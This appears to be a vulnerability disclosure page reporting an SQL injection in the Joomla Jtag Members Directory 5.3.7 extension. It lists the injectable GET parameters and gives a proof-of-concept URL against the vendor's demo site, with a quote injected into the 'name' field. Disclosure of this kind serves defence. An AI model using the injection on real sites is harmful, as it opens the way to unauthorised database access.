Joomla Jtag Members Directory 5.3.7 SQL Injection

2017.12.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Joomla Jtag Members Directory 5.3.7 - SQL injection #Credit: Bilal KARDADOU #Vendor: https://joomlatag.com #URL: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/ #Product: 'Joomla Jtag Members Directory 5.3.7' #Developer: JoomlaTag #Last updated: Jun 19 2017 #Compatibility: 3.X #Type: Paid download ################################################ # # Description: # JTag Member Directory extension helps in the management of user profiles with the ability to publish member information in a simple searchable directory. # This extension is great for Non-profits, clubs, local chapters or Board member websites. # # GET -p [customtext] # [name] # [country] # [state] # [city] # [phone_no] # # http://demos.joomlatag.com/jtag-membersdirectory/index.php?option=com_jtagmembersdirectory&format=raw&customtext=&name=dean "&country=&state=&city=&phone_no= # # PoC: # https://prnt.sc/hu107i # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top